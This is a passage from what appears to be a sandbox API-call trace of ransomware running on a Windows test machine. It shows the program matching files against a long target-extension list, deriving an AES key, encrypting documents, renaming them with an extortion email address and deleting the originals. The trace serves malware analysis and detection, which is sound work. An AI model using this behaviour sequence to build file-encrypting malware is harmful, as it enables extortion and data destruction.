.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.545] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.546] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.546] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.548] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1370d, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x1370d, lpOverlapped=0x0) returned 1
	[0185.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.553] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0185.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.555] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.556] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.556] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0185.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.556] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1370d, dwBufLen=0x1370d | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x13710) returned 1
	[0185.557] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.558] RtlMoveMemory (in: Destination=0xff0898, Source=0xfdd180, Length=0x1370d | out: Destination=0xff0898) 
	[0185.558] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.558] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff0898*, pdwDataLen=0x18bc0c*=0x1370d, dwBufLen=0x13710 | out: pbData=0xff0898*, pdwDataLen=0x18bc0c*=0x13710) returned 1
	[0185.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.561] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0185.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.561] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0185.562] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.562] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0185.562] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.562] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.563] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.563] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.564] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 93
	[0185.565] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.565] WriteFile (in: hFile=0x2c0, lpBuffer=0xff0898*, nNumberOfBytesToWrite=0x13710, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff0898*, lpNumberOfBytesWritten=0x18c068*=0x13710, lpOverlapped=0x0) returned 1
	[0185.571] CloseHandle (hObject=0x2c0) returned 1
	[0185.572] CloseHandle (hObject=0x384) returned 1
	[0185.572] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf")) returned 1
	[0185.621] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf")) returned 0
	[0185.621] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6404670, ftCreationTime.dwHighDateTime=0x1d9747f, ftLastAccessTime.dwLowDateTime=0x2b8b4300, ftLastAccessTime.dwHighDateTime=0x1d975ce, ftLastWriteTime.dwLowDateTime=0x2b8b4300, ftLastWriteTime.dwHighDateTime=0x1d975ce, nFileSizeHigh=0x0, nFileSizeLow=0x1c7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="grUYCJv3NF.ods", cAlternateFileName="GRUYCJ~1.ODS")) returned 1
	[0185.622] lstrcmpW (lpString1="grUYCJv3NF.ods", lpString2="..") returned 1
	[0185.622] lstrcmpW (lpString1="grUYCJv3NF.ods", lpString2=".") returned 1
	[0185.622] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="grUYCJv3NF.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\grUYCJv3NF.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\grUYCJv3NF.ods"
	[0185.622] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\grUYCJv3NF.ods") returned 46
	[0185.622] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.623] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\grUYCJv3NF.ods", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods") returned 0x2e
	[0185.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.623] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.623] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods") returned="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods"
	[0185.623] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods") returned 46
	[0185.623] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.624] StrStrW (lpFirst=".ods", lpSrch=".") returned=".ods"
	[0185.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.624] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ods") returned=".ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.624] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.625] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.625] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.628] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1c7a, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x1c7a, lpOverlapped=0x0) returned 1
	[0185.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.631] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0185.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.633] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.634] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.634] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0185.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
